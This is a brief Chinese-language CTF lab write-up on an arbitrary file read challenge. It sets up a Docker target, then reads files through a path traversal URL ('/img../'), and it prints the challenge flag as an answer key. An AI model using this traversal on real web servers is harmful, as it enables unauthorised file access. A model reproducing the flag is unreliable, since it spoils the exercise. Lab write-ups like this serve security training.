1.1漏洞描述
| 漏洞名称 | 任意文件读取漏洞 afr_2 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐⭐ |
| 漏洞环境 | dockers |
| 攻击方式 |
1.2漏洞等级
高危
1.3影响版本
暂无
1.4漏洞复现
1.4.1.基础环境
| 靶场 | dockers |
| 工具 | BurpSuite |
1.4.2.环境搭建
1.kali创建docker-compose.yml文件
touch docker-compose.yml
2.将下面内容写入文件
version: '3.2'
services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-2:latest
ports:
- 80:80
3.开启docker
sudo docker-compose up -d
flagn1book{afr_2_solved}
关闭
sudo docker-compose down
4. 访问kali 80端口
1.5深度利用
1.5.1靶机攻略
1.查看源码
2.尝试路径穿越
http://10.9.47.79/img../
点击下载
查看flag
n1book{afr_2_solved}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
